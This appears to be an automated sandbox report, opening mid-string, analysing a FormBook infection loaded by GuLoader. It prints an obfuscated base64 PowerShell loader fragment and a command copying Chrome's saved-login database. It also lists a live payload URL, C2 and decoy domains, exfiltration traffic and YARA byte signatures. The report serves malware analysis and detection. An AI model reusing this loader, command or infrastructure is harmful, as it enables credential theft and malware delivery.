CAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 10008 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 10032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

ieinstal.exe (PID: 10144 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 416 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

explorer.exe (PID: 4828 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

chkdsk.exe (PID: 4556 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

cmd.exe (PID: 7364 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

firefox.exe (PID: 7624 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

ieinstal.exe (PID: 1404 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)

ieinstal.exe (PID: 2160 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 18 entries

Snort Signatures

ETPRO TROJAN MalDoc Requesting Payload 2020-04-21 - Source IP: 192.168.11.20 - Destination IP: 203.170.86.89

Timestamp:	192.168.11.20203.170.86.8949759802842115 05/10/22-14:22:49.687558
SID:	2842115
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /wn19/ HTTP/1.1Host: www.borneadomicile.comConnection: closeContent-Length: 227520Cache-Control: no-cacheOrigin: http://www.borneadomicile.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.borneadomicile.com/wn19/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41

Source: unknown

DNS traffic detected: queries for: barsam.com.au

Source: global traffic	HTTP traffic detected: GET /bin_FCWtLoO90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\chkdsk.exe	Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini	Jump to dropped file
Source: C:\Windows\SysWOW64\chkdsk.exe	Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrv.ini	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.ini	Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Wscript starts Powershell (via cmd or directly)

